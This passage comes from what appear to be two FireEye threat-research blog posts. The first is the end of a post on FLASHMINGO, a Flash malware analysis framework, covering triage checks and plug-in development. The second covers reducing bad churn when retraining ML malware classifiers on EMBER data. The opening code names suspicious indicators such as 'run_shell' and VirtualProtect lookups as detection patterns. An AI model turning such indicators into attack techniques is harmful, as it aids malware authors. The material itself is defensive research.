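name_hits = flag_method_names(["run_shell", "find_virtualprotect", "onEnterFrame"])
constant_hits = flag_constants([1, 0x5A4D])
print(name_hits, constant_hits)
```

Both checks are cheap triage signals: they can raise false positives on benign code, so a hit is a reason to look closer, not a verdict.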

Extending FLASHMINGO With Your Own Plug-ins

FLASHMINGO is very easy to extend. Every plug-in is located in its own directory under the plug-ins directory. At start-up FLASHMINGO searches all plug-in directories for a manifest file (explained later in the post) and registers the plug-in if it is marked as active.

To accelerate development a template plug-in is provided. To add your own plug-in, copy the template directory, rename it, and edit its manifest and code. The template plug-in’s manifest, written in YAML, is shown below:

```
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing

```

The most important parameters in this file are name and active. The name parameter is used internally by FLASHMINGO to refer to the plug-in. The active parameter is a Boolean value (yes or no) indicating whether this plug-in should be active or not. By default, all plug-ins (except the template) are active, but there may be cases where a user would want to deactivate a plug-in. The parameters description and returns are simple strings to display documentation to the user. Finally, plug-in manifests are parsed once at program start. Adding new plug-ins or enabling/disabling plug-ins requires restarting FLASHMINGO.
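
As a rough picture of how such a manifest could drive registration, the sketch below parses the flat `key: value` layout with the standard library only and keeps the plug-ins marked active. This is an assumption-laden illustration: FLASHMINGO's own loader is not shown in this post and presumably uses a YAML library. The second manifest and the function names are hypothetical.

```python
TEMPLATE_MANIFEST = """\
# This is a template for easy development
name: Template
active: no
description: copy this to kickstart development
returns: nothing
"""

# Hypothetical manifest for an enabled plug-in, for comparison.
EXAMPLE_MANIFEST = """\
name: binary_data
active: yes
description: returns embedded binary data
returns: a dictionary
"""


def parse_manifest(text: str) -> dict:
    """Parse a flat 'key: value' manifest; YAML-style yes/no become booleans."""
    booleans = {"yes": True, "no": False, "true": True, "false": False}
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        key, _, value = line.partition(":")
        value = value.strip()
        manifest[key.strip()] = booleans.get(value.lower(), value)
    return manifest


def active_plugins(manifests):
    """Return the names of the plug-ins whose manifest marks them active."""
    return [m["name"] for m in manifests if m.get("active") is True]


template = parse_manifest(TEMPLATE_MANIFEST)
registered = active_plugins([template, parse_manifest(EXAMPLE_MANIFEST)])
print(registered)
```

Since manifests are read once at start-up, flipping `active` in a file only takes effect on the next run, which matches the restart requirement described above.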

Now for the actual code implementing the business logic. The file plugin.py contains a class named Plugin; the only thing that is needed is to implement its run method. Each plug-in receives an instance of a SWFObject as a parameter. The code will interact with this object and return data in a custom format, defined by the user. This way, the user's plug-ins can be written to produce data that can be directly ingested by their infrastructure.

Let's see how easy it is to create plug-ins by walking through one that is included, named binary_data. By default, this plug-in returns all embedded data in a SWF file. If the user specifies the optional parameter pattern, the plug-in instead searches for matches of that byte sequence within the embedded data, returning a dictionary of embedded data and the offset at which the pattern was found.

First, we define the optional argument pattern to be supplied by the user (line 2 and line 4):

Afterwards, implement a custom run method and all other code needed to support it:

This is a simple but useful plug-in that illustrates how to interact with FLASHMINGO. The plug-in has a logging facility accessible through the property “ml” (line 2). By default it logs to FLASHMINGO’s main logger. If unspecified, it falls back to a log file within the plug-in’s directory. Lines 10 to 16 show the custom run method, which extracts information from the SWF’s embedded data with the help of the custom _inspect_binary_data method. Note the source of this binary data: it is read from a property named “swf”. This is the SWFObject passed to the plug-in as an argument, as mentioned previously. More complex analysis can be performed on the SWF file contents by interacting with this swf object. Our repository contains documentation for all available methods of a SWFObject.
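The behaviour described for binary_data can be approximated with a short sketch. It is not the shipped plug-in: FakeSWF, its binary_data attribute, the constructor signature, and the shape of the returned dictionary are all assumptions made for illustration. The repository documentation describes the real SWFObject interface.

```python
class FakeSWF:
    """Hypothetical stand-in for SWFObject: maps a blob name to raw bytes."""

    def __init__(self, binary_data):
        self.binary_data = binary_data


class Plugin:
    """Sketch of a binary_data-style plug-in (all names are illustrative)."""

    def __init__(self, swf, pattern=None):
        self.swf = swf
        self.pattern = pattern  # optional byte sequence to search for

    def _inspect_binary_data(self):
        """Return {name: [offsets]} for every blob containing the pattern."""
        hits = {}
        for name, data in self.swf.binary_data.items():
            offsets = []
            start = data.find(self.pattern)
            while start != -1:
                offsets.append(start)
                start = data.find(self.pattern, start + 1)
            if offsets:
                hits[name] = offsets
        return hits

    def run(self):
        # No pattern: return all embedded data. Pattern: return match offsets.
        if self.pattern is None:
            return dict(self.swf.binary_data)
        return self._inspect_binary_data()


swf = FakeSWF({"payload": b"\x00\x00MZ\x90\x00MZ", "icon": b"\x89PNG"})
print(Plugin(swf).run())
print(Plugin(swf, pattern=b"MZ").run())
```

Returning plain dictionaries keeps the output easy to serialise, which fits the goal of producing data that downstream infrastructure can ingest directly.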

Conclusion

Even though Flash is set to reach its end of life at the end of 2020 and most of the development community moved away from it long ago, we predict that we’ll see Flash being used as an infection vector for a while. Legacy technologies are juicy targets for attackers due to the lack of security updates. FLASHMINGO provides malware analysts with a flexible framework to quickly deal with these pesky Flash samples without getting bogged down in the intricacies of the execution environment and file format.

Find the FLASHMINGO tool on the FireEye public GitHub Repository.

Churning Out Machine Learning Models: Handling Changes in Model Predictions

Threat Research

David Krisiloff

9 April 2019 at 17:00

Introduction

Machine learning (ML) is playing an increasingly important role in cyber security. Here at FireEye, we employ ML for a variety of tasks such as antivirus, malicious PowerShell detection, and correlating threat actor behavior. While many people think that a data scientist’s job is finished when a model is built, the truth is that cyber threats constantly change and so must our models. The initial training is only the start of the process, and ML model maintenance creates a large amount of technical debt. Google provides a helpful introduction to this topic in their paper “Machine Learning: The High-Interest Credit Card of Technical Debt.” A key concept from the paper is the principle of CACE: change anything, change everything. Because ML models deliberately find nonlinear dependencies between input data, small changes in our data can create cascading effects on model accuracy and on downstream systems that consume those model predictions. This creates an inherent conflict in cyber security modeling: (1) we need to update models over time to adjust to current threats and (2) changing models can lead to unpredictable outcomes that we need to mitigate.

Ideally, when we update a model, the only changes in model outputs are improvements, e.g. fixes to previous errors. Both false negatives (missing malicious activity) and false positives (alerts on benign activity) have significant impact and should be minimized. Since no ML model is perfect, we mitigate mistakes with orthogonal approaches: whitelists and blacklists, external intelligence feeds, rule-based systems, etc. Combining the model with other information also provides context for alerts that may not otherwise be present. However, CACE! These integrated systems can suffer unintended side effects from a model update. Even when the overall model accuracy has increased, individual changes in model output are not guaranteed to be improvements. Introduction of new false negatives or false positives in an updated model, called churn, creates the potential for new vulnerabilities and negative interactions with cyber security infrastructure that consumes model output. In this article, we discuss churn, how it creates technical debt when considering the larger cyber security product, and methods to reduce it.

Prediction Churn

Whenever we retrain our cyber security-focused ML models, we need to be able to calculate and control for churn. Formally, prediction churn is defined as the expected percent difference between two different model predictions (note that prediction churn is not the same as customer churn, the loss of customers over time, which is the more common usage of the term in business analytics). It was originally defined by Cormier et al. for a variety of applications. For cyber security applications, we are often concerned with just those differences where the newer model performs worse than the older model. Let’s define bad churn when retraining a classifier as the percentage of samples in the test set that the retrained model misclassifies but the original model classified correctly.
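Both definitions reduce to simple counting once the two models' predictions are lined up against the true labels. The sketch below assumes hard 0/1 labels and uses the full test-set size as the denominator. The function names and the ten-sample toy data are illustrative, not taken from our experiments.

```python
def churn(old_pred, new_pred):
    """Percent of samples on which the two models disagree."""
    if len(old_pred) != len(new_pred):
        raise ValueError("prediction lists must have the same length")
    changed = sum(o != n for o, n in zip(old_pred, new_pred))
    return 100.0 * changed / len(old_pred)


def bad_churn(y_true, old_pred, new_pred):
    """Percent of samples the old model got right and the new model gets wrong."""
    regressions = sum(
        o == y and n != y for y, o, n in zip(y_true, old_pred, new_pred)
    )
    return 100.0 * regressions / len(y_true)


def accuracy(y_true, pred):
    """Percent of samples classified correctly."""
    return 100.0 * sum(y == p for y, p in zip(y_true, pred)) / len(y_true)


# Toy data: 1 = malicious, 0 = benign.
y_true = [1, 1, 1, 1, 1, 0, 0, 0, 0, 0]
old = [1, 1, 0, 0, 1, 0, 0, 1, 0, 0]  # three errors
new = [1, 1, 1, 1, 0, 0, 0, 1, 0, 0]  # two errors, one of them new

print(accuracy(y_true, old), accuracy(y_true, new))
print(churn(old, new), bad_churn(y_true, old, new))
```

In this toy case the new model is more accurate (80% versus 70%), yet 10% of the samples are bad churn: one sample that the old model classified correctly is now wrong.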

Churn is often a surprising and non-intuitive concept. After all, if the accuracy of our new model is better than the accuracy of our old model, what’s the problem? Consider the simple linear classification problem of malicious red squares and benign blue circles in Figure 1. The original model, A, makes three misclassifications while the newer model, B, makes only two errors. B is the more accurate model. Note, however, that B introduces a new mistake in the lower right corner, misclassifying a red square as benign. That square was correctly classified by model A and represents an instance of bad churn. Clearly, it’s possible to reduce the overall error rate while introducing a small number of new errors which did not exist in the older model.

Figure 1: Two linear classifiers with errors highlighted in orange. The original classifier A has lower accuracy than B. However, B introduces a new error in the bottom right corner.

Practically, churn introduces two problems in our models. First, bad churn may require changes to the whitelists and blacklists used in conjunction with ML models. As we previously discussed, these are used to handle the small but inevitable number of incorrect classifications. Testing on large repositories of data is necessary to catch such changes and update the associated whitelists and blacklists. Second, churn may create issues for other ML models or rule-based systems which rely on the output of the ML model. For example, consider a hypothetical system which evaluates URLs using both an ML model and a noisy blacklist. The system generates an alert if

P(URL = ‘malicious’) > 0.9 or
P(URL = ‘malicious’) > 0.5 and the URL is on the blacklist

After retraining, the distribution of P(URL=‘malicious’) changes and all .com domains receive a higher score. The alert rules may need to be readjusted to maintain the required overall accuracy of the combined system. Ultimately, finding ways of reducing churn minimizes this kind of technical debt.
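The interaction between the rule thresholds and a shifted score distribution can be made concrete with a small sketch. The function name should_alert and the two scores are hypothetical; only the thresholds come from the rules above.

```python
def should_alert(p_malicious, on_blacklist):
    """Alert on a high score alone, or on a medium score plus a blacklist hit."""
    return p_malicious > 0.9 or (p_malicious > 0.5 and on_blacklist)


# Hypothetical scores for the same blacklisted URL before and after retraining.
score_old, score_new = 0.45, 0.55

print(should_alert(score_old, on_blacklist=True))
print(should_alert(score_new, on_blacklist=True))
```

A shift of only 0.1 in the model score flips the combined decision from no alert to alert, even though neither the blacklist nor the rule changed.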

Experimental Setup

We’re going to explore churn and churn reduction techniques using EMBER, an open source malware classification data set. It consists of 1.1 million PE files first seen in 2017, along with their labels and features. The objective is to classify the files as either goodware or malware. For our purposes we need to construct not one model, but two, in order to calculate the churn between models. We have split the data set into three pieces:

January through August is used as training data
September and October are used to simulate running the model in production and retraining (test 1 in Figure 2).
November and December are used to evaluate the models from step 1 and 2 (test 2 in Figure 2).
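A month-based split like this can be sketched as follows, assuming each record carries its first-seen month as a YYYY-MM string. The key name appeared, the helper assign_split, and the sample records are assumptions for illustration.

```python
def assign_split(first_seen):
    """Map a 'YYYY-MM' first-seen month to train, test1 or test2."""
    month = int(first_seen.split("-")[1])
    if not 1 <= month <= 12:
        raise ValueError(f"invalid month in {first_seen!r}")
    if month <= 8:       # January through August
        return "train"
    if month <= 10:      # September and October
        return "test1"
    return "test2"       # November and December


# Made-up records; real feature vectors are omitted.
records = [
    {"sha256": "a", "appeared": "2017-03"},
    {"sha256": "b", "appeared": "2017-09"},
    {"sha256": "c", "appeared": "2017-12"},
]

splits = {"train": [], "test1": [], "test2": []}
for rec in records:
    splits[assign_split(rec["appeared"])].append(rec["sha256"])

print(splits)
```

Splitting on time rather than at random keeps the evaluation honest: each test set contains only files that appeared after everything the model was trained on.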

Figure 2: A comparison of our experimental setup versus the original EMBER data split. EMBER has a ten-month training set and a two-month test set. Our setup splits the data into three sets to simulate model training, then retraining while keeping an independent data set for final evaluation.

Figure 2 shows our data split and how it compares to the original EMBER data split. We have built a LightGBM classifier on the training data, which we’ll refer to as the baseline model. To simulate production testing, we run the baseline model on test 1 and record the FPs and FNs. Then, we retrain our model using both the training data and the FPs/FNs from test 1. We’ll refer to this model as the standard retrain. This is a reasonably realistic simulation of actual production data collection and model retraining. Finally, both the baseline model and the standard retrain are evaluated on test 2. The standard retrain has a higher accuracy than the baseline on test 2 (99.33% vs. 99.10%). However, the retrained model makes 246 misclassifications that the baseline did not, which corresponds to 0.12% bad churn.

Incremental Learning

Since our rationale for retraining is that cyber security threats change over time, i.e. concept drift, it’s a natural suggestion to use techniques like incremental learning to handle retraining. In incremental learning we take new data to learn new concepts without forgetting (all) previously learned concepts. That also suggests that an incrementally trained model may not have as much churn, as the concepts learned in the baseline model still exist in the new model. Not all ML models support incremental learning, but linear and logistic regression, neural networks, and some decision trees do. Other ML models can be modified to implement incremental learning. For our experiment, we incrementally trained the baseline LightGBM model by augmenting the training data with FPs and FNs from test 1 and then training an additional 100 trees on top of the baseline model (for a total of 1,100 trees). Unlike the baseline model, we use regularization (L2 parameter of 1.0); using no regularization resulted in overfitting to the new points. The incremental model has a bad churn of 0.05% (113 samples total) and 99.34% accuracy on test 2. Another interesting metric is the model’s performance on the new training data: how many of the baseline FPs and FNs from test 1 does the new model fix? The incrementally trained model correctly classifies 84% of the previous incorrect classifications. In a very broad sense, incrementally training on a previous model’s mistakes provides a “patch” for the “bugs” of the old model.
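The "fix rate" mentioned above, the share of the old model's mistakes that the new model gets right, is straightforward to compute. The sketch below assumes hard 0/1 labels. The function name fix_rate and the toy data are illustrative only.

```python
def fix_rate(y_true, old_pred, new_pred):
    """Percent of the old model's mistakes that the new model classifies correctly."""
    old_errors = [
        (y, n) for y, o, n in zip(y_true, old_pred, new_pred) if o != y
    ]
    if not old_errors:
        return 0.0  # nothing to fix
    fixed = sum(n == y for y, n in old_errors)
    return 100.0 * fixed / len(old_errors)


# Toy data: the old model makes four mistakes, the new model fixes three.
y_true = [1, 1, 0, 0, 1, 0]
old = [0, 0, 1, 1, 1, 0]
new = [1, 1, 0, 1, 1, 0]

print(fix_rate(y_true, old, new))
```

Read together with bad churn, this metric shows both sides of a retrain: how many old bugs were patched and how many new ones were introduced.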

Churn-Aware Learning

Incremental approaches only work if the features of the original and new model are identical. If new features are added, say to improve model accuracy, then alternative methods are required. If what we desire is both accuracy and low churn, then the most straightforward solution is to include both of these requirements when training. That’s the approach taken by Cormier et al., where samples received different weights during training in such a way as to minimize churn. We have made a few deviations in our approach: (1) we are interested in reducing bad churn (churn involving new misclassifications) as opposed to all churn and (2) we would like to avoid the extreme memory requirements of the original method. In a similar manner to Cormier et al., we want to reduce the weight, i.e. importance, of previously misclassified samples during training of a new model. In practice, repeating a mistake of the previous model then costs the new model less than making a new mistake. Our weighting scheme gives all samples correctly classified by the original model a weight of one, and all other samples a weight of w = α – β |0.5 – P_old(χ_i)|, where P_old(χ_i) is the output of the old model on sample χ_i and α, β are adjustable hyperparameters. We train this reduced churn operator model (RCOP) using an α of 0.9, a β of 0.6 and the same training data as the incremental model. RCOP produces 0.09% bad churn and 99.38% accuracy on test 2.
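The weighting scheme can be written as a small function. This is a minimal sketch under two assumptions that are not stated above: the old model's output is a probability of the malicious class, and it is turned into a hard label with a 0.5 threshold. The function name rcop_weight and the sample values are illustrative.

```python
def rcop_weight(y_true, p_old, alpha=0.9, beta=0.6, threshold=0.5):
    """Sample weight for churn-aware retraining.

    y_true: true label (1 = malicious, 0 = benign).
    p_old:  old model's predicted probability of the malicious class.
    The 0.5 decision threshold is an assumption of this sketch.
    """
    old_label = 1 if p_old >= threshold else 0
    if old_label == y_true:
        return 1.0  # old model was right: full weight
    # Old model was wrong: the more confident the mistake, the lower the weight.
    return alpha - beta * abs(0.5 - p_old)


samples = [
    (1, 0.95),  # malware, correctly flagged
    (1, 0.40),  # malware, narrowly missed
    (1, 0.05),  # malware, confidently missed
    (0, 0.90),  # goodware, confidently flagged
]
for label, p in samples:
    print(label, p, round(rcop_weight(label, p), 2))
```

With α = 0.9 and β = 0.6, misclassified samples receive weights between 0.6 and 0.9, and the most confident mistakes of the old model get the lowest weight. Weights like these would typically be supplied to the learner as per-sample training weights.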

Results

Figure 3 shows both accuracy and bad churn of each model on test set 2. We compare the baseline model, the standard model retrain, the incrementally learned model and the RCOP model.

Figure 3: Bad churn versus accuracy on test set 2.

Table 1 summarizes each of these approaches, discussed in detail above.

Name	Trained on	Method	Total # of trees
Baseline	train	LightGBM	1000
Standard retrain	train + FPs/FNs from baseline on test 1	LightGBM	1100
Incremental model	train + FPs/FNs from baseline on test 1	Trained 100 new trees, starting from the baseline model	1100
RCOP	train + FPs/FNs from baseline on test 1	LightGBM with altered sample weights	1100

Table 1: A description of the models tested

The baseline model has 100 fewer trees than the other models, which could explain the comparatively reduced accuracy. However, we tried increasing the number of trees, which resulted in only a minor increase in accuracy of < 0.001%. The increase in accuracy for the non-baseline methods is due to the differences in data set and training methods. Both incremental training and RCOP work as expected, producing less churn than the standard retrain while showing accuracy improvements over the baseline. In general, increasing accuracy tends to be correlated with increasing bad churn: there is no free lunch. Accuracy increases because the decision boundary changes, and the greater the improvement, the more the boundary changes. It seems reasonable that more changes to the decision boundary correlate with more bad churn, although we see no theoretical justification for why that must always be the case.

Unexpectedly, both the incremental model and RCOP produce more accurate models with less churn than the standard retrain. We would have assumed that, given their additional constraints, both models would trade lower accuracy for lower churn. The most direct comparison is RCOP versus the standard retrain. Both models use identical data sets and model parameters, varying only by the weights associated with each sample. RCOP reduces the weight of samples incorrectly classified by the baseline model. That reduction is responsible for the improvement in accuracy. A possible explanation of this behavior is mislabeled training data. Multiple authors have suggested identifying and removing points with label noise, often using the misclassifications of a previously trained model to identify those noisy points. Our scheme, which reduces the weight of those points instead of removing them, is similar to those noise reduction approaches, which could explain the accuracy improvement.

Conclusion

ML models experience an inherent struggle: not retraining means being vulnerable to new classes of threats, while retraining causes churn and potentially reintroduces old vulnerabilities. In this blog post, we have discussed two different approaches to modifying ML model training in order to reduce churn: incremental model training and churn-aware learning. Both demonstrate effectiveness on the EMBER malware classification data set by reducing the bad churn while simultaneously improving accuracy. Finally, we also demonstrated the novel conclusion that reducing churn in a data set with label noise can result in a more accurate model. Overall, these approaches provide low technical debt solutions to updating models that allow data scientists and machine learning engineers to keep their models up-to-date against the latest cyber threats at minimal cost. At FireEye, our data scientists work closely with the FireEye Labs detection analysts to quickly identify misclassifications and use these techniques to reduce the impact of churn on our customers.